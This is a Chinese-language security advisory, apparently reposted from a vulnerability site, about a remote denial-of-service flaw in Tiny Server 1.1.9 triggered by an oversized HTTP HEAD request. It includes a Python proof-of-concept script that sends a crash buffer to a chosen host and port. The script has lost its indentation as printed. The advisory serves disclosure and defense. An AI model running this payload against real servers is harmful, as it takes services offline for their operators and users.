Tiny Server HTTP HEAD请求远程拒绝服务漏洞

发布日期:2012-03-20
更新日期:2012-03-21

受影响系统:
Tiny Server Tiny Server 1.1.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52635

Tiny Server是个基本的HTTP服务器。

Tiny Server在实现上存在远程拒绝服务漏洞,成功利用后可允许远程攻击者使受影响应用程序崩溃。

<*来源:Brock Haun
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Brock Haun ()提供了如下测试方法:

#!/usr/bin/python
###############################################################################
# Overflow exploiting a vulnerability in Tiny Server <=1.1.9 (HTTP) HEAD request.
# Date of Discovery: 3/19/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download:
# Software Version: <=1.1.9
# Target OS: Windows (Tested on Windows 7)
###############################################################################
import httplib,sys
if (len(sys.argv) != 3):
print '\n\t[*]Usage:  ./' + sys.argv[0] + ' <target
host> <port>'
sys.exit()
host = sys.argv[1]
port = sys.argv[2]
buffer = 'A' * 100 + 'HTTP/1.0\r\n'
print '\n[*]*************************************************'
print '[*] Tiny Server <= 1.1.0(HTTP) HEAD request overflow'
print '[*] Written by Brock Haun'
print '[*] security.brockhaun@gmail.com'
print '[*]*************************************************\n'
try:
print '\n\t[*] Attempting connection.'
httpServ = httplib.HTTPConnection(host , port)
httpServ.connect()
print '\n\t[*] Connected.'
print '\n\t[*] Sending crash buffer.'
httpServ.request('HEAD' , buffer)
print '\n\t[*] Done! Target should be unresponsive!'
except:
print '\n\t[***] Connection error. Something went wrong. :('
httpServ.close()
sys.exit()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Tiny Server
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwgfsj.html